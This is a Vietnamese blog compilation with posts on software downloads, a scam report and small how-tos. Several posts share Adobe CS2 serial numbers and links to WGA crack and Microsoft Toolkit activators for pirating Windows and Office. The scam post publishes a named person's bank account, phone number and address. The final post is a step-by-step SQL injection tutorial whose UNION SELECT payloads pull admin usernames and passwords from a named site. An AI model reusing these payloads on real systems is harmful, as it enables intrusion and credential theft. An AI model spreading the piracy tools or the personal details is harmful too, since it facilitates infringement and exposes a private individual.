Adobe cho tải miễn phí bộ ứng dụng CS2

Năm 2013 đã đến, và Adobe quyết định tung ra một chương trình khuyến mãi đặc biệt khi cho phép khách hàng tải miễn phí bộ ứng dụng Creative Suite 2 của mình mà không cần bất cứ điều kiện gì, kể cả một tài khoản đăng nhập. Ngay từ bây giờ, bạn có thể truy cập vào địa chỉ này để tải về bộ Adobe CS2 kể trên, hoàn toàn miễn phí.

Creative Suite là bộ trọn gói các phần mềm dành cho đồ họa, biên tập video, viết web… của Adobe. Bản CS2 được phát hành hồi tháng 4/2005, gồm có Photoshop CS2 (bản 9.0), Audition 3.0, Acrobat 3D 1.0, Acrobat Pro 8.0, Illustrator CS, InCopy CS2, InDesign CS, Adobe Premiere Pro 2.0.

Bản CS2 mà Adobe đang cho tải miễn phí có phiên bản cho Windows (từ XP trở lên là chạy ngon) và Mac OS X (Mac OS X chỉ có hỗ trợ v.10.2.8–v.10.3.8. PowerPC® G4 or G5 processor – Như vậy, người dùng Mac bắt buộc phải xài Snow Leopard trở xuống và phải cài Rosetta).

Theo thông báo của Hãng Adobe trên diễn đàn, đây không phải là chương trình “biếu không” phần mềm CS2 mà chỉ là tiến trình cho ngưng hoạt động các máy chủ kiểm tra bản quyền khi người dùng cài đặt CS2 và đăng ký sử dụng. Tuy nhiên, thử nghiệm tải và đăng ký sử dụng hoàn toàn không gặp trở ngại gì.

. Link tải và license bản quyền do Adobe cung cấp ở đây.

CS2 System Requirements

  • Mac OS X v.10.2.8–v.10.3.8. PowerPC® G4 or G5 processor
  • Microsoft® Windows® 2000/Windows XP. Intel® Pentium® III or 4 processor

ProductPlatformDownloadsSerial number
Creative Suite 2MacCS2_install_Mac.pdf1130-0412-8377-1896-9751-5759
CS_20_IE_NonRet_D1.dmg.bin
CS_20_IE_NonRet_D2.dmg.bin
CS_20_IE_NonRet_D3.dmg.bin
VCS2.dmg
CS_2.0_IE_Extras_1.dmg.bin
WinCS2_install_Win.pdf1130-1414-7569-4457-6613-5551
CreativeSuiteCS2Disc1.exe
CreativeSuiteCS2Disc2.exe
CreativeSuiteCS2Disc3.exe
VCS2.zip
CS_2.0_WWE_Extras_1.exe
Acrobat 3D 1.0 for WindowsWinAC3D_1.0_Volume_NACK_WWE.zip1159-1414-7569-3493-5006-5653
Acrobat Standard 7.0Win22001904.exe1016-1415-6379-6184-1333-2468
Acrobat Pro 7.0Win22020134.exe1118-1414-8477-7606-6339-4141
After EffectsMacclamchop-x244-install.dmg1063-0418-7724-1551-7671-3039
Winclamchop-x244-install-oem.zip1063-1417-2474-8268-4115-9194
Audition 3.0WinADBEAudition_loopolgy.exe1137-1004-8571-6848-7845-8029
ADBEAudition_ESD1_WWEFGJIS.exe
ADBEAudition_loopolgy.7z
GoLive CS2MacGL_CS2_UE_NonRet.dmg.bin1033-0415-6162-2671-3431-0993
WinGL_CS2_UE_NonRet.exe1033-1418-1610-5696-5209-0095
Illustrator CS2MacAI_CS2_IE_NonRet.dmg.bin1034-0416-0740-0527-2887-2375
WinAI_CS2_IE_NonRet.exe1034-1415-6230-2341-2884-9398
InCopy CS2MacIC_CS2_UE_NonRet.dmg.bin1036-0414-4367-5110-5897-2432
WinIC_CS2_UE_NonRet.exe1036-1419-3531-6378-2148-9313
InDesign CS2MacID_CS2_UE_NonRet.dmg1037-0413-9961-4063-8457-1098
WinID_CS2_UE_NonRet.exe1037-1412-5094-8316-6812-7982
Photoshop CS2MacPhSp_CS2_English.dmg.bin1045-0410-5403-3188-5429-0639
WinPhSp_CS2_English.exe1045-1412-5685-1654-6343-1431
Adobe Premiere Pro 2.0WinPPRO_2.0_Ret-NH_UE.zip1132-1280-4900-7476-5108-8019

Link down đế chế 1 chuẩn Age Of Empires 1 Setup

Age Of Empires 1 Setup
by Microsoft Studios

Published October 15, 1997
Usage CC0 1.0 Universal
Topics Age, Of, Empires, 1, Setup

Age of Empires is a history-based real-time strategy video game developed by Ensemble Studios and published by Microsoft. The game uses the Genie, a 2D sprite-based game engine.

Identifier AgeOfEmpires1Setup
Mediatype software
Creator Microsoft Studios
Date 1997-10-15
Licenseurl http://creativecommons.org/publicdomain/zero/1.0/
Scanner Internet Archive HTML5 Uploader 1.6.3
Publicdate 2017-01-01 18:47:59
Addeddate 2017-01-01 18:47:59
Year 1997
Language English

https://drive.google.com/file/d/0B0x5WbPiQ0WtcWpmalk2YUZlMEk/view?usp=sharing

0191000312218 HA THU TUYEN scam lừa đảo

Haiza!….
Là 1 người cẩn thận có kinh nghiệm giao dịch trực tuyến thế mà bị lừa chỉ vì tội mọi người đã làm mình tin quá 🙂
Số là mình hay giao dịch trực tuyến trên mạng nên thường xuyên giao dịch với anh em cũng được mấy năm rồi. Từ ngày giao dịch đến giờ chưa có bị lừa lần nào nên có vẻ mình cũng cả tin dần nên mới có vụ hôm nay.
Hôm nay mình lên mạng mua ít $ chuẩn bị cho ngày blackfriday thì đọc được cái topic này:

Topic lừa đảo
Topic lừa đảo

Vào comment 1 cái hỏi xem thế nào cũng ko có để lại yahoo lát sau thì thấy nó pm. Hơ hơ, sao nó lại biết nick yahoo của mình nhỉ? Thôi thì mình post thông tin đầy rẫy lên mạng nên nó tìm được thì cũng ko sao nó làm ăn trên mạng những cái cơ bản này nó cũng biết
Ngồi chát chít một lúc nói chung nó cũng có nhiều cái nghi vấn nhưng mà thôi kệ nó, niềm tin là chủ yếu. Nói thật là em đặt niềm tin ở con người hơi nhiều nên ko cần nói nhiều lát sau thì em đi chuyển tiền vào tài khoản và chuyển cho nó.
Chuyển tiền
Chuyển tiền

Đây là nội dung chat chít với nó. Hii…haivl
Lúc đầu chát với nick milito197823
Log chát milito197823
Log chát milito197823

sau chat sang nick power_vnvn
log chat power_vnvn
log chat power_vnvn

Log chát tiếp
Log chát tiếp

Nói chung là dài dòng chốt lại là em quá tin người thông tin scam của nó đầy rẫy trên mạng ko check. Haiiza…
0191000312218 google
0191000312218 google

Chốt lại là không nên tin ai cả người ta bảo khôn 3 năm dại 1 giờ giờ thì em đã hiểu. Em cũng chả tiếc gì mấy trăm ngàn nhưng tiếc là “nuôi thứ không đáng nuôi”, tiếp tay cho nó làm xấu xã hội. Em viết bài viết này hy vọng nó và con cháu nó đọc được cho nó lớn lên người. Người ta bảo ai nên khôn cũng dại một đôi lần chắc em còn phải dài dài nữa. Nếu ai đó đọc được bài viết này hy vọng các bạn sẽ ko bị lừa ai chưa bị lừa thì rút kinh nghiệm nha 🙂

Nhân tiện trích dẫn thêm tài khoản Vietcombank nó dùng lừa đảo

Giao dịch với Scam
Giao dịch với Scam

0031000155226
Họ và tên: Nguyễn Hồng Quang
Sinh năm: 1991
Địa chỉ: Kiến An, Hải Phòng
Y!M: loboandj
Số điện thoại: 0167233907

Mở file FLV, MP4 trong VirtualDub

Không ai phủ nhận thế mạnh của VirtualDub trong việc xử lý các tập tin video, tuy nhiên khó khăn mà nó mang lại cũng không ít, đặc biệt là đối với các bạn mới tập làm quen, và một trong số đó chính là… dùng VirtualDub để mở các file .FLV và .MP4 – những dạng file phổ biến nhất hiện nay trên internet.

VirtualDub
VirtualDub

* MỞ FILE .FLV BẰNG VIRTUALDUB:

Để mở được các file .FLV trong VirtualDub, thật ra không khó. Điều chúng ta cần là bổ sung vào thư viện plugins của nó những plugins hỗ trợ .FLV. Cụ thể, các bạn cần thực hiện theo những bước sau:

1. Download 3 file: VirtualDub 1.9.11 | FLV Input Driver | ffdshow

2. Giải nén VirtualDub 1.9.11 và đặt toàn bộ thư mục vừa giải nén vào một nơi cố định (để sử dụng lâu dài).

3. Giải nén FLV Input Driver, và copy file FLVInputDriver.vdplugin đặt vào thư mục …\VirtualDub 1.9.11\plugins.

4. Cài đặt file ffdshow đã download ở bước 1. Trong quá trình cài đặt, bạn cần cấu hình theo ảnh sau:

Cài đặt ffdshow
Cài đặt ffdshow

5. Sau khi việc cài đặt hoàn thành, bạn mở ffdshow trong Start Menu lên, và chọn VFW Configuration. Đi đến mục Decoder, chọn Codecs, nhìn các codecs bên tay phải được liệt kê, tìm đến FLV1VP6F, chuyển chúng từ disable thành libavcodec. Sau đó Apply và Save lại.

Điều lưu ý ở đây, khi mở file thì ở mục Files of type, bạn phải chọn Flash Video Files (.flv) thì mới có thể mở được file .FLV của bạn.

open flv file type
open flv file type

* MỞ FILE .MP4 BẰNG VIRTUALDUB:

Để mở được file .MP4 trong VirtualDub, bạn cần cài đặt một plugin mang tên: DShowInputDriver.

Sau khi download về và tiến hành giải nén, bạn sẽ thấy một số plugins hỗ trợ mở các dạng file thường gặp cho VirtualDub, và một trong số đó có tên DShowInputDriver. Nhiệm vụ của bạn lúc này là copy file DShowInputDriver.vdplugin (hoặc tất cả các plugins nếu bạn muốn thư viện của VirtualDub thêm đồ sộ) vào thư mục …\VirtualDub 1.9.11\plugins.

Một lưu ý dành riêng cho bạn, nếu file .MP4 của bạn sử dụng AAC audio (AAC-LC audio type) thì VirtualDub không thể mở được. Và lúc này, bạn phải cầu cứu một chương trình chuyển đổi mạnh mẽ hơn như MeGui để có thể đáp ứng các yêu cầu của bạn.

Hướng dẫn về MeGui, bạn có thể đọc tại đây…

Alêhấp, mọi thứ hoàn tất… Và giờ bạn có thể thưởng thức thành quả của mình rồi 🙂

Bài viết này mình sao chép lại từ blog quachben.com

6 lời khuyên nên đọc

VỀ KIẾM TIỀN: đừng bao giờ phụ thuộc vào một nguồn thu nhập duy nhất. Hãy đầu tư để tạo ra nguồn thứ hai.

VỀ TIÊU TIỀN: nếu như bạn cứ mua những thứ bạn không cần thì sớm muộn gì bạn cũng phải bán những thứ mình cần.

VỀ TIẾT KIỆM TIỀN: không nên tiết kiệm những khoản còn lại sau chi tiêu, mà hãy tiêu những khoản còn lại sau khi tiết kiệm.

VỀ MẠO HIỂM: đừng bao giờ thử độ sâu của dòng sông bằng cả hai chân.

VỀ ĐẦU TƯ: đừng bao giờ cho hết tất cả số trứng vào một rổ.

VỀ SỰ KÌ VỌNG: Trung thực là một món quà vô cùng đắt giá và đừng mong chờ chúng từ những kẻ rẻ tiền.

“Cờ rách” Windows XP

Đợt này con laptop thân yêu của mình phải nằm viện mang qua chỗ sửa chữa kêu chết nguồn và màn hình tình hình là em nó còn nằm viện dài vì thế mà mình dùng laptop Acer cổ cài windows XP dùng chống cháy. Nhân vụ dùng lại windows XP thì bị báo “This copy of Windows is not genuine” màn hình tối thui nên mình chia sẻ các bạn công cụ nhỏ rất hữu ích có thể cờ rách hợp thức hóa bản quyền mọi phiên bản windows xp. Với công cụ này bạn có thể thoải mái update từ microsoft: Windows media player 11 , Windows Update, Microsoft Download Center and Microsoft Update. Công cụ này có tên là Microsoft Genuine Advantage – WGA / OGA Crack

Microsoft Genuine Advantage - WGA / OGA Crack
Microsoft Genuine Advantage – WGA / OGA Crack

Hướng dẫn sử dụng:

Install Notes:
1. Extract into a new empty folder
2. Run Setup.exe
Notes:
WGA crack release works on Microsoft Windows 2000, XP, Vista, 7 (32bit/64bit)
1.Close ALL Internet Explorer windows before use
2. Run the crack self-installer file and follow instructions.
3. System reboots automatically to complete installation.
4. Start downloading All Windows Operating System updates.
Updated, to work with the SP2 releases of Vista, and Internet Explorer 8 and Windows Media Player 11 and Windows Defender.

Công cụ này quảng cáo có thể cờ rách office 2003, 2007 tuy nhiên mình dùng 2010 nên test không được. Thấy anh em trên mạng quảng cáo là có thể cài được Windows Defense tuy nhiên máy cùi quá nên chưa cài thử để test
Anh em down load về và làm theo hướng dẫn nhé. Chúc thành công!
URL mật khẩu nếu có là hanamonline.com nhé

https://docs.google.com/file/d/0B0x5WbPiQ0Wtb2x3LS1NM01DRU0/edit?usp=sharing

Chỉnh sửa giới hạn upload limit 300kb / 1000 x 1000px Opencart

Giới hạn upload 300kb và kích thước lớn nhất 1000px x 1000px của Opencart tất nhiên là tương đối hợp lý vì với kích thước quá lớn thì cũng không view hết trên màn hình mà dung lượng lớn quá thì dẫn đến việc xử lý ảnh và load cũng chậm. Tuy nhiên việc kích thước ảnh lớn và dung lượng lớn cũng có nhiều cái lợi nhất là khi bạn là nhà phân phối bạn phải cung cấp hình ảnh ở độ phân giải tốt nhất và sắc nét nhất cho đại lý. Việc cung cấp hình ảnh rõ ràng, chất lượng cao giúp cho khách hàng của bạn xem hình ảnh rõ nhất

Opencart Upload limit
Opencart Upload limit

Để tăng giới hạn upload bạn chỉnh sửa file admin\controller\common\filemanager.php
Tìm đoạn:
[code]
if ($this->request->files[‘image’][‘size’] > 300000) {
$json[‘error’] = $this->language->get(‘error_file_size’);
}
[/code]
Sửa 300000 = 300kb sửa số này thành số bạn muốn

Thêm gadget twitter feed/ twitter timeline widget vào blogger

Hiển thị gadget twitter feed hay twitter profile timeline trên blog của bạn có 2 lợi ích:
+ Người dùng xem blog dễ dàng kết nối với twitter của bạn từ đó dễ theo dõi cập nhật của bạn hơn
+ Bạn dễ dàng theo dõi các cập nhật trên twitter từ blog của bạn
Mặc dù twitter không phải là mạng xã hội phổ biến với người dùng nhưng đối với dân SEO thì đây vẫn là 1 kênh đáng để khai thác
Sau đây là các bước cơ bản để thêm tweet feed / twitter timeline của bạn vào blog
Bước 1: Tạo widget timeline trong tài khoản twitter của bạn. Truy cập địa chỉ:

https://twitter.com/settings/widgets

Quản lý widgets của twitter
Quản lý widgets của twitter

Nhấn Create new(mình để ngôn ngữ là tiếng Anh) và điền các thông tin cần thiết

Thêm mới 1 widget twitter
Thêm mới 1 widget twitter

Có 1 số thông tin cơ bản như chiều cao của widget, giao diện sáng/tối…xong bạn nhấn Creat widget
Bên tay phải khung preview sẽ hiện ra code widget của bạn copy code đó code của mình
[js]
<a class="twitter-timeline" href="https://twitter.com/hanamonline" data-widget-id="371565767713497088">Tweets by @hanamonline</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?’http’:’https’;if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+"://platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script>
[/js]

Chọn và copy code widget twitter
Chọn và copy code widget twitter

Bước 2: Upload code lên hostting của bạn ở đây mình khuyến khích các bạn sử dụng luôn Google gadget editor để lưu code. Truy cập url

http://www.google.com/ig/ifr?url=gge.xml

Dán code bạn vừa copy vào sau CDATA

Dán code vào google gadget code editor
Dán code vào google gadget code editor

Vào menu File/Save as lưu lại với tên tùy chọn

Save Google gadget code
Save Google gadget code

Mình lưu lại với tên anybuy-on-twitter. Sau khi save xong nhìn sang bên phải thấy file của bạn. Copy url của file

copy url google gadget code
copy url google gadget code

Bước 3: Vào quản lý blogger của bạn. Chọn cài đặt bố cục, thêm tiện ích(mình để tiếng Việt)

Thêm tiện ích blogger
Thêm tiện ích blogger

Một cửa sổ popup hiện lên chọn mục Thêm miền riêng của bạn và paste url vừa copy vào chọn Thêm bằng URL.

Thêm tiện ích từ URL tùy chỉnh
Thêm tiện ích từ URL tùy chỉnh

OK vậy là xong rồi đó và giờ cùng xem lại thành quả nào

Twitter widgets on Blogger
Twitter widgets on Blogger

Chúc các bạn thành công

Microsoft Toolkit 2.4.7 bản quyền Office, Windows chỉ là chuyện nhỏ

Không biết là nên vui hay nên buồn khi mà việc tìm link crack cho phần mềm ngày càng khó. Bản quyền ngày càng bị siết chặt. Các URL chia sẻ link phần mềm lậu ngày càng bị google trảm và vắng bóng. Hôm nay nhân vụ Office 2013 đòi kích hoạt bản quyền mình chia sẻ link down bộ microsoft toolkit này

Microsoft Tookit
Microsoft Tookit

Microsoft toolkit bao gồm 2 công cụ riêng biệt là Windows Toolkit và OfficeToolkit
+ Office Toolkit: bao gồm các chức năng như cho biết thông tin về phiên bản Office đang dùng, công cụ gỡ bỏ Office đang dùng, công cụ kích hoạt Office đang dùng, công cụ cài đặt key để setup, backup key bản quyền, gỡ bỏ key bị backlist, tạo bản cài đặt Office tùy chỉnh
Office Toolkit
Office Toolkit

+ Windows Toolkit: bao gồm các chức năng như hiển thị thông tin Windows đang sử dụng, kích hoạt phiên bản Windows đang sử dụng vượt WGA, disable check online, cài đặt key, sao lưu key bản quyền, check key backlist
Windows Toolkit
Windows Toolkit

Bộ công cụ này tích hợp EZ-Activator, AutoKMS
Phiên bản 2.4.7 có thể áp dụng cho Office 2003, Office 2007, Office 2010, Office 2013, Windows Vista, Windows 7, Windows 8
Yêu cầu hệ thống:

Microsoft .NET Framework 4.0 or 4.5 (Not 3.5)
Microsoft Office 2010 or Later for Office Toolkit Support
Windows Vista or Later for Windows Toolkit Support

Cuối cùng là download:

https://docs.google.com/file/d/0B0x5WbPiQ0WtcGhQaWxhV09VaVE/edit?usp=sharing

Mật khẩu mặc định là domain hanamonline.com
Nếu link die thì báo cho mình để mình update lại. Chúc các bạn thành công

Hướng dẫn khai thác MySQL SQL Injection

I. Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL

Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0

Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1
Thực hiện thêm dấu ‘ sau id=1. URL trở thành http://seamoun.com/phpevents/event.php?id=1’
Ta phát hiện rằng phpvents có lỗi SQL Injection với thông báo sau:

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\phpevents\event.php on line 37

Đối tượng khai thác SQL Injection ở đây là “Basic PHP Events Lister 1.0”. Giả sử chúng ta không biết trường và bảng của ứng dụng web này là gì?
Với lỗi SQL Injection gây ra bởi URL trên ta xem thử truy vấn (SQL) của nó liệu có bao nhiều trường. Sở dĩ cần xác định điều này
bởi vì khi chúng ta dùng UNION trong câu lệnh SQL thì số lượng trường của hai câu lệnh select phải trùng nhau.
(Các bạn không rõ vấn đề này thì xem ý nghĩa câu lệnh SQL. Ở đây mình không giải thích vì hiển nhiên phải hiểu rõ SQL mới khai thá được).
Xác định có bao nhiêu trường truy vấn với URL http://seamoun.com/phpevents/event.php?id=1 có rất nhiều cách để thực hiện. Ở đây mình sử dụng order by . Thực hiện tăng dần . Khi thực hiện order by , nếu trang web không hiển thị lỗi tức là số lượng trường vẫn còn, thực hiện tăng cho đến khi nào xuất hiện lỗi tức là ta đã thực hiện tìm đủ số lượng trường.

Lần lượt mình thử:

http://seamoun.com/phpevents/event.php?id=1 order by 1
http://seamoun.com/phpevents/event.php?id=1 order by 2
http://seamoun.com/phpevents/event.php?id=1 order by 3

http://seamoun.com/phpevents/event.php?id=1 order by 15 (<-- Vẫn OK) http://seamoun.com/phpevents/event.php?id=1 order by 16 (Xuất hiện lỗi)

Như vậy truy vấn SQL với URL trên là 15 trường (field)
Đến đây có thể điều tra phiên bản SQL, user với lệnh sau

http://seamoun.com/phpevents/event.php?id=1 union all select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1
http://seamoun.com/phpevents/event.php?id=1 union all select 1,user(),1,1,1,1,1,1,1,1,1,1,1,1,1

Sau khi đã có số lượng trường rồi thì lúc này sẽ tiến hành đoán bảng (table) login của nó: có thể thử với các table thông dụng như
manager, admin, administrator, systemlogin, … (Việc đoán table thuộc về kinh nghiệm, kết hợp với việc crawl, spider nội dung web mà mình khai thác). Nếu như tên bảng không đúng thì khi thực hiện union all select … nó sẽ thông báo lỗi, ngược lại nếu tên đúng thì nó chạy OK. Tiến hành thử tìm table như sau:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from systemlogin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from manager (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Sau khi đoán được tên table là admin. Tiếp theo là dự đoán tên trường trong bảng admin mà mình đã lấy được.
Có thể đoán tên trường trong bảng admin như là username,uname,user, … pass, passwd, password, pword, …. (Tương tự như trên cũng tùy thuộc vào kinh nghiệm kết hợp với việc crawl, spider nội dung web để tìm tên trường). Tiền hành thử như sau

http://seamoun.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Như vậy trường thứ nhất ta đoán được là uname trong bảng admin. Thực hiện đoán trường mật khẩu

http://seamoun.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Như vậy ta đoán được trường mật khẩu là pword. Như vậy ta đã có thông tin đầy đủ để lấy user và pass trong bảng admin với
2 trường uname và pword + tên bảng là admin
Thực hiện lệnh:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin.

Thực chất với hai câu lệnh trên thì ta tìm được user và pass nhưng muốn thực hiện lệnh http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin. Để có được tất cả user và pass trong bảng admin. Nếu trường hợp này xuất hiện lỗi ta có thể thêm limit 0,1 và tăng dần limit 1,1 limit 2,1 để lấy hết tất cả user và pass

Sở dĩ thực hiện câu lệnh trên để đồng thời lấy uname và pword không cần phải thực hiện 2 lần mới có được uname và pword.
0x3a—> dấu “:”. Concat sẽ thực hiện cộng chuỗi

Đến đây ta đã có thông tin uname và pword.
Nếu trường hợp mà kết nối đến MySQL sử dụng user root thì việc tìm bảng và trường dễ dàng hơn với lệnh sau

Điều tra thông tin bảng:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables

Điều tra thông tin trường:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns

Ngoài ra trong một số trường hợp xuất hiện lỗi khi thực hiện khai thác có thể sử dụng hàm convert, hex, … để không bị lỗi khi khai thác như:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin

II. Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0 (milw0rm.com)

Đây chỉ là hướng dẫn cơ bản nhất về khai thác SQL – Injection đối với MySQL. Các bạn demo thì install trên máy mình để kiểm tra, đừng đi hack người khác à nha.
Nguồn: http://www.hvaonline.net/hvaonline/posts/list/25210.hva